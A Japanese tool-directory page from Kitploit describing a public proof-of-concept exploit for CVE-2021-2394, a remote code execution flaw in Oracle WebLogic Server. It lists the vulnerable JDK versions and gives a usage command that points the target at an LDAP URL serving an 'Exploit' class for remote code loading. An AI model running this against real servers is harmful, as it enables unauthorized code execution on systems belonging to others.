Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-2394 — CVE-2021-2394の概念実証エクスプロイト。Oracle WebLogic Serverのリモートコード実行の脆弱性です。LDAPまたはRMIの逆シリアル化を使用してペイロードを配信します。 | Kitploit
ツール/GitHubGitHub/lz2y/cve-2021-2394
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHublz2y/cve-2021-2394

CVE-2021-2394

CVE-2021-2394の概念実証エクスプロイト。Oracle WebLogic Serverのリモートコード実行の脆弱性です。LDAPまたはRMIの逆シリアル化を使用してペイロードを配信します。

リポジトリを見る
402014年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-2394

POC of CVE-2021-2394

  • 免責事項
    • 本プロジェクトは学習目的のみで使用してください。無許可の検出によって生じた直接的または間接的な結果や損害は、すべて使用者本人が負うものとします。
  • 注意事項

    • PoCはIIOPを使用してパケットを送信します。関連する依存関係を追加してください(12.2.1.3.0バージョンの依存関係はリリースに含まれています)。
    • 低バージョンのJDKを使用してweblogicをインストールし、テストを行ってください。

      RMIベースの利用方法では、JDKバージョンは6u132、7u131、8u121より前である必要があります。8u122以降では、逆シリアル化のホワイトリスト機構が追加され、RMIによるリモートコードロードが無効になりました。 LDAPベースの利用方法では、JDKバージョンは6u211、7u201、8u191、11.0.1より前である必要があります。8u191では、OracleがLDAPベクターに制限を設定し、CVE-2018-3149を公開してJNDIリモートクラスロードを無効にしました。 From:https://www.freebuf.com/vuls/279465.html

    • 仮想マシン環境で再現できない場合は、https://xz.aliyun.com/t/7498 を参照してください。
  • 使用方法:

    • LDAPサービスを起動してください。
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • eg:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • 参考リンク:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • 更新

    • 2021/8/15 不要なコードを削除しました。
  • 分析記事

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
ツールをダウンロード